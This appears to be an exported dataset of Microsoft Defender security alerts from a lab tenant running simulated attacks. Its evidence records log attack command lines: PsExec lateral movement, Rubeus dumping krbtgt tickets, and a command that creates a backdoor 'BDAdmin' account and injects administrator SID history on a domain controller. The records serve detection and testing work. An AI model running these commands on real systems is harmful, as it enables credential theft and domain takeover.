alertId stringclasses 278 values | providerAlertId stringclasses 278 values | incidentId int64 486 989 ⌀ | serviceSource stringclasses 2 values | creationTime stringdate 2022-09-30 05:04:51 2023-01-24 06:03:50 ⌀ | lastUpdatedTime stringdate 2022-11-12 01:35:42 2023-01-24 06:05:47 ⌀ | resolvedTime stringclasses 23 values | firstActivity stringdate 2022-09-07 09:25:00 2023-01-24 05:31:07 ⌀ | lastActivity stringdate 2022-09-30 05:00:00 2023-01-24 05:43:53 ⌀ | title stringclasses 62 values | description stringclasses 51 values | category stringclasses 12 values | status stringclasses 2 values | severity stringclasses 4 values | investigationId int64 20 64 ⌀ | investigationState stringclasses 9 values | classification stringclasses 1 value | determination stringclasses 1 value | detectionSource stringclasses 7 values | detectorId stringclasses 48 values | assignedTo stringclasses 3 values | actorName stringclasses 1 value | threatFamilyName stringclasses 6 values | mitreTechniques listlengths 0 8 ⌀ | devices listlengths 1 6 ⌀ | entities listlengths 0 49 ⌀ | entityType stringclasses 2 values | evidenceCreationTime stringclasses 469 values | verdict stringclasses 5 values | remediationStatus stringclasses 2 values | accountName stringclasses 30 values | domainName stringclasses 17 values | userSid stringclasses 22 values | aadUserId stringclasses 8 values | userPrincipalName stringclasses 14 values | sha1 stringclasses 28 values | sha256 stringclasses 27 values | fileName stringclasses 21 values | filePath stringclasses 13 values | processId int64 0 20.7k ⌀ | processCommandLine stringclasses 67 values | processCreationTime stringclasses 133 values | parentProcessId int64 0 14.6k ⌀ | parentProcessCreationTime stringclasses 63 values | parentProcessFileName stringclasses 14 values | parentProcessFilePath stringclasses 11 values | detectionStatus stringclasses 1 value | deviceId stringclasses 9 values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:03:40.5733333Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153615959669_-297285872 | fc813b73-a927-40c7-979f-4c6aa80a9786 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:16:01.5959867Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:13:03.9622957Z | 2022-09-30T06:13:03.9622957Z | Suspicious service launched | A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device. | Execution | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | a5af9713-6eea-4d23-9bdc-9cab19f19092 | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1569.002"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Critical",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:33:31.3666667Z | Suspicious | None | darol | malicious.io | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:44.9Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 10,556 | whoami /all | 2022-11-21T02:01:37.8071047Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T04:51:54.57Z | Suspicious | None | hacker | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930661007015_1390205570 | 110e581a-b121-4c70-b48a-e5d68fd5e1aa | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:04:26.100718Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:02:29.8592876Z | 2022-11-21T02:11:53.0116481Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Critical",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:26.1266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
aa34310f27-bb21-4e63-a412-b971ff37f4f2 | 34310f27-bb21-4e63-a412-b971ff37f4f2 | 686 | MicrosoftDefenderForIdentity | 2022-11-11T08:24:15.3930109Z | 2022-11-12T01:40:19.2533333Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:17:54.266549Z | 2022-11-11T08:17:54.268357Z | Remote code execution attempt | An actor attempted to run commands remotely on MSDXV2-DC from MSDXV2-Win10V, using 1 service. | Execution | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | AzureATP | RemoteExecutionSecurityAlert | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1047",
"T1059",
"T1053",
"T1569",
"T1059.001",
"T1053.002",
"T1053.005",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "vpn.zone",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "vpn.zone",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:58:22.77Z | Malicious | None | ronhd | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1111 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T09:05:50.6533333Z | Malicious | None | jeff | null | S-1-5-21-2300221942-1987151257-321556088-1104 | null | null | 21e48eb44f6d3aec36111c0e39819ab47761c1a5 | f772c97ff2827eff3c27ed36a0054300c70ef110a714050e210b64e6d3931712 | outlook.exe | 7,076 | "OUTLOOK.EXE" | 2022-11-11T07:41:26.4391868Z | 4,680 | 2022-11-10T07:07:26.0872385Z | null | null | null | null | |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:22:11.45Z | Malicious | None | ronhd | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930247809639_427005270 | f73e0038-445a-4a72-bbb3-9e5a7b207025 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:44.7809854Z | 2022-11-21T02:44:52.5766667Z | null | 2022-11-21T02:01:36.9984727Z | 2022-11-21T02:34:15.386942Z | PsExec launched a command on a remote device | PsExec was used to launch a command on a remote device. PsExec is a tool used to launch programs on remote, or local devices. An attacker might be leveraging this tool to launch malicious commands to a remote device and move laterally in the organization. | LateralMovement | New | Medium | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 40eca4c4-8854-418a-8024-fff7c9d7b077 | null | null | null | [
"T1021",
"T1021.002",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:44.8266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:44.8266667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:01:44.3957302Z",
"processId": 11616,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:44.8266667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:44.3957302Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11616,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:01:45.0913234Z",
"processId": 11072,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:05:50.4333333Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:44.3957302Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11616,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:02:06.6655672Z",
"processId": 10844,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:07:50.4766667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'",
"processCreationTime": "2022-11-21T02:01:28.4753286Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:07:50.4766667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:02:27.6005533Z",
"processId": 9792,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:08:40.52Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:06:54.069205Z",
"processId": 10844,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:07.0566667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:05:31.04716Z",
"processId": 5688,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:07.0566667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:05:31.04716Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 5688,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:05:53.1996041Z",
"processId": 4328,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:07.3366667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:05:31.04716Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 5688,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:05:31.7209294Z",
"processId": 2888,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:47.55Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:11:27.8289307Z",
"processId": 3412,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:47.55Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:11:27.8289307Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3412,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:11:28.5199595Z",
"processId": 3644,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:47.8866667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:11:27.8289307Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3412,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:11:50.0760328Z",
"processId": 8596,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
